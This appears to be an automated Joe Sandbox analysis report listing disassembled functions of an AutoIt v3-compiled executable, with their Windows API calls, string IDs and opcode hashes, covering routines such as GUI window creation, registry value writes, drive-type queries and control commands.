                                                                  Function 00695524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00695532
                                                                  • GetDriveTypeW.KERNEL32(?,006BDC30,?,\\.\,006BDCD0), ref: 0069560F
                                                                  • SetErrorMode.KERNEL32(00000000,006BDC30,?,\\.\,006BDCD0), ref: 0069577B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  • Opcode ID: 5f84efbe1943de4e62cb9c17e8993b283118bb3258dfb38dc6976eb8553514ee
                                                                  • Instruction ID: 6d48aa9687aaed123c9b1820a170bc88d018b4acef5dc62a69eee4e2bd2832ff
                                                                  • Opcode Fuzzy Hash: 5f84efbe1943de4e62cb9c17e8993b283118bb3258dfb38dc6976eb8553514ee
                                                                  • Instruction Fuzzy Hash: 3561F130A09A45DFCF2ADF64ED918B877ABEF14310B258019E407AF6A1D731EE42CB41
                                                                  Function 00622521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006225F8
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00622600
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0062262B
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00622633
                                                                  • GetSystemMetrics.USER32(00000004), ref: 00622658
                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00622675
                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00622685
                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006226B8
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006226CC
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 006226EA
                                                                  • GetStockObject.GDI32(00000011), ref: 00622706
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00622711
                                                                    • Part of subcall function 006219CD: GetCursorPos.USER32(?), ref: 006219E1
                                                                    • Part of subcall function 006219CD: ScreenToClient.USER32(00000000,?), ref: 006219FE
                                                                    • Part of subcall function 006219CD: GetAsyncKeyState.USER32(00000001), ref: 00621A23
                                                                    • Part of subcall function 006219CD: GetAsyncKeyState.USER32(00000002), ref: 00621A3D
                                                                  • SetTimer.USER32(00000000,00000000,00000028,0062199C), ref: 00622738
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: <)o$<)o$AutoIt v3 GUI$(o$(o$(o
                                                                  • API String ID: 1458621304-1044363296
                                                                  • Opcode ID: 79255fef59ab9de0ffb78995d1e486370d32b103eafb36c60e8c3357e5858058
                                                                  • Instruction ID: d4f5c506fc7ae6b3979573cdbc5abbc43fcdd0cb4191937f5e51f52b02332612
                                                                  • Opcode Fuzzy Hash: 79255fef59ab9de0ffb78995d1e486370d32b103eafb36c60e8c3357e5858058
                                                                  • Instruction Fuzzy Hash: B3B18C71A0021AAFCB14DFA8DC95BEE7BB6FB48314F104219FA15AB390D7749840CF50
                                                                  Function 006B1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 006B1BC4
                                                                  • GetDesktopWindow.USER32 ref: 006B1BD9
                                                                  • GetWindowRect.USER32(00000000), ref: 006B1BE0
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B1C35
                                                                  • DestroyWindow.USER32(?), ref: 006B1C55
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006B1C89
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006B1CA7
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006B1CB9
                                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 006B1CCE
                                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 006B1CE1
                                                                  • IsWindowVisible.USER32(00000000), ref: 006B1D3D
                                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006B1D58
                                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006B1D6C
                                                                  • GetWindowRect.USER32(00000000,?), ref: 006B1D84
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 006B1DAA
                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 006B1DC4
                                                                  • CopyRect.USER32(?,?), ref: 006B1DDB
                                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 006B1E46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: ef20a2d6e5d7e5425643e16a49fbdb558fadb80756e5b1e8cc7fe66225098eeb
                                                                  • Instruction ID: 3f833e6c90099545a14d855aa79d5a573d09d0bf7645d95c81ce874b46e271dd
                                                                  • Opcode Fuzzy Hash: ef20a2d6e5d7e5425643e16a49fbdb558fadb80756e5b1e8cc7fe66225098eeb
                                                                  • Instruction Fuzzy Hash: BDB1BEB1604301AFD714DF64C894B9AFBE6FF85310F408A1CF5999B2A1DB31E885CB96
                                                                  Function 006B0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 006B0D81
                                                                  • _wcslen.LIBCMT ref: 006B0DBB
                                                                  • _wcslen.LIBCMT ref: 006B0E25
                                                                  • _wcslen.LIBCMT ref: 006B0E8D
                                                                  • _wcslen.LIBCMT ref: 006B0F11
                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006B0F61
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006B0FA0
                                                                    • Part of subcall function 0063FD52: _wcslen.LIBCMT ref: 0063FD5D
                                                                    • Part of subcall function 00682B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00682BA5
                                                                    • Part of subcall function 00682B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00682BD7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                  • API String ID: 1103490817-719923060
                                                                  • Opcode ID: 70d92775b87d12cb13d4adf608b17abd042d40d7c2576d6642c1a772fd4e1c95
                                                                  • Instruction ID: c6f433d2c201e7cd9e8a2a472a12b476fdfa34a53d0d79a4f137ae2721fa9ddc
                                                                  • Opcode Fuzzy Hash: 70d92775b87d12cb13d4adf608b17abd042d40d7c2576d6642c1a772fd4e1c95
                                                                  • Instruction Fuzzy Hash: E3E1BF712043419FC714DF28C8518AAB7E7FF89354B14496DF8969B3A1DB30ED86CB91
                                                                  Function 006816D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00681A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00681A60
                                                                    • Part of subcall function 00681A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A6C
                                                                    • Part of subcall function 00681A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A7B
                                                                    • Part of subcall function 00681A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A82
                                                                    • Part of subcall function 00681A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00681A99
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00681741
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00681775
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0068178C
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 006817C6
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006817E2
                                                                  • GetLengthSid.ADVAPI32(?), ref: 006817F9
                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00681801
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00681808
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00681829
                                                                  • CopySid.ADVAPI32(00000000), ref: 00681830
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0068185F
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00681881
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00681893
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006818BA
                                                                  • HeapFree.KERNEL32(00000000), ref: 006818C1
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006818CA
                                                                  • HeapFree.KERNEL32(00000000), ref: 006818D1
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006818DA
                                                                  • HeapFree.KERNEL32(00000000), ref: 006818E1
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006818ED
                                                                  • HeapFree.KERNEL32(00000000), ref: 006818F4
                                                                    • Part of subcall function 00681ADF: GetProcessHeap.KERNEL32(00000008,006814FD,?,00000000,?,006814FD,?), ref: 00681AED
                                                                    • Part of subcall function 00681ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,006814FD,?), ref: 00681AF4
                                                                    • Part of subcall function 00681ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006814FD,?), ref: 00681B03
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                  • String ID:
                                                                  • API String ID: 4175595110-0
                                                                  • Opcode ID: efff9b7f7acd1c281fdb25c9e0628eb1e1a968e87cae2227e3db39bc3be3bce7
                                                                  • Instruction ID: 38b159595c83ca7bb58ae7179e547665e3cfa818df050fe0cab264abcdee075f
                                                                  • Opcode Fuzzy Hash: efff9b7f7acd1c281fdb25c9e0628eb1e1a968e87cae2227e3db39bc3be3bce7
                                                                  • Instruction Fuzzy Hash: B1714EF1D00209ABDB10EFA5DC45FEEBBBEAF05310F144225E915AA290E7719946CB61
                                                                  Function 006ACE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006ACF1D
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,006BDCD0,00000000,?,00000000,?,?), ref: 006ACFA4
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 006AD004
                                                                  • _wcslen.LIBCMT ref: 006AD054
                                                                  • _wcslen.LIBCMT ref: 006AD0CF
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 006AD112
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 006AD221
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 006AD2AD
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006AD2E1
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006AD2EE
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 006AD3C0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 9721498-966354055
                                                                  • Opcode ID: cebe984b7d21a136a2916e6ac20cdd43328e35900ee4ddb3d218ccf9d1d98a62
                                                                  • Instruction ID: 67fec99406edb4f08a41e5aaac986239efd36b5f1acda4e4f527dffeac12a223
                                                                  • Opcode Fuzzy Hash: cebe984b7d21a136a2916e6ac20cdd43328e35900ee4ddb3d218ccf9d1d98a62
                                                                  • Instruction Fuzzy Hash: 681268356046119FCB54EF14C881B6ABBE6EF89714F05885CF98A9B3A2CB31ED41CF85
                                                                  Function 006B13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 006B1462
                                                                  • _wcslen.LIBCMT ref: 006B149D
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006B14F0
                                                                  • _wcslen.LIBCMT ref: 006B1526
                                                                  • _wcslen.LIBCMT ref: 006B15A2
                                                                  • _wcslen.LIBCMT ref: 006B161D
                                                                    • Part of subcall function 0063FD52: _wcslen.LIBCMT ref: 0063FD5D
                                                                    • Part of subcall function 00683535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00683547
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 1103490817-4258414348
                                                                  • Opcode ID: c5b30d688b9add6e4f4fc0c3999c8a5142c1de997a3f5c0c282cf4490f64134d
                                                                  • Instruction ID: 2820512072a818e10444bd7f32b06889c7ded216a6b91013d1bee59fea939b68
                                                                  • Opcode Fuzzy Hash: c5b30d688b9add6e4f4fc0c3999c8a5142c1de997a3f5c0c282cf4490f64134d
                                                                  • Instruction Fuzzy Hash: B1E1AEB26047519FC714DF24C4608AAB7E3BF99314F54895CF8969B3A2DB30ED85CB81
                                                                  Function 006AD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$BuffCharUpper
                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 1256254125-909552448
                                                                  • Opcode ID: 155a316b4ba592b3267d82d23aae7efcb3f1a7d30c30b8532a33e1c3695553c7
                                                                  • Instruction ID: abc1db4192b19dd873c719bb0937883bb5286bbb9de323762576de7d40cd785b
                                                                  • Opcode Fuzzy Hash: 155a316b4ba592b3267d82d23aae7efcb3f1a7d30c30b8532a33e1c3695553c7
                                                                  • Instruction Fuzzy Hash: 25710672A0052A8BCB10BF38C9505FE3393AF66754F250128F86B9B794EA35DD45CB90
                                                                  Function 006B8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 006B8DB5
                                                                  • _wcslen.LIBCMT ref: 006B8DC9
                                                                  • _wcslen.LIBCMT ref: 006B8DEC
                                                                  • _wcslen.LIBCMT ref: 006B8E0F
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006B8E4D
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006B6691), ref: 006B8EA9
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006B8EE2
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006B8F25
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006B8F5C
                                                                  • FreeLibrary.KERNEL32(?), ref: 006B8F68
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006B8F78
                                                                  • DestroyIcon.USER32(?,?,?,?,?,006B6691), ref: 006B8F87
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006B8FA4
                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006B8FB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                  • String ID: .dll$.exe$.icl
                                                                  • API String ID: 799131459-1154884017
                                                                  • Opcode ID: 17bb85b2bf832a9d17bd86fe9b0ab3fb99e14a0387109a2235493dc1e679bd71
                                                                  • Instruction ID: b3681d88c7282ad8b956f469638b7417f0dc3894112ff4866ce2e7fd55d09ef8
                                                                  • Opcode Fuzzy Hash: 17bb85b2bf832a9d17bd86fe9b0ab3fb99e14a0387109a2235493dc1e679bd71
                                                                  • Instruction Fuzzy Hash: 8761D1B1900615BEEB249F64CC42BFE77AEAF08B50F10421AF915DB1D1EF749981CBA0
                                                                  Function 006948BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0069493D
                                                                  • _wcslen.LIBCMT ref: 00694948
                                                                  • _wcslen.LIBCMT ref: 0069499F
                                                                  • _wcslen.LIBCMT ref: 006949DD
                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00694A1B
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00694A63
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00694A9E
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00694ACC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 1839972693-4113822522
                                                                  • Opcode ID: 3b5bf0bea0de28264d19f00981d89583e0fe0f6bbefcbea386c4cc67e9809dac
                                                                  • Instruction ID: b081ba3b0ec29e91dae73350f718732d8df391b32a4eeebe3bcf17d9b586fadf
                                                                  • Opcode Fuzzy Hash: 3b5bf0bea0de28264d19f00981d89583e0fe0f6bbefcbea386c4cc67e9809dac
                                                                  • Instruction Fuzzy Hash: AA71EE725087118FCB50EF24D8809ABB7EAEF98758F10492DF89697361EB31DD46CB81
                                                                  Function 00686382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconW.USER32(00000063), ref: 00686395
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006863A7
                                                                  • SetWindowTextW.USER32(?,?), ref: 006863BE
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 006863D3
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 006863D9
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 006863E9
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 006863EF
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00686410
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0068642A
                                                                  • GetWindowRect.USER32(?,?), ref: 00686433
                                                                  • _wcslen.LIBCMT ref: 0068649A
                                                                  • SetWindowTextW.USER32(?,?), ref: 006864D6
                                                                  • GetDesktopWindow.USER32 ref: 006864DC
                                                                  • GetWindowRect.USER32(00000000), ref: 006864E3
                                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0068653A
                                                                  • GetClientRect.USER32(?,?), ref: 00686547
                                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 0068656C
                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00686596
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
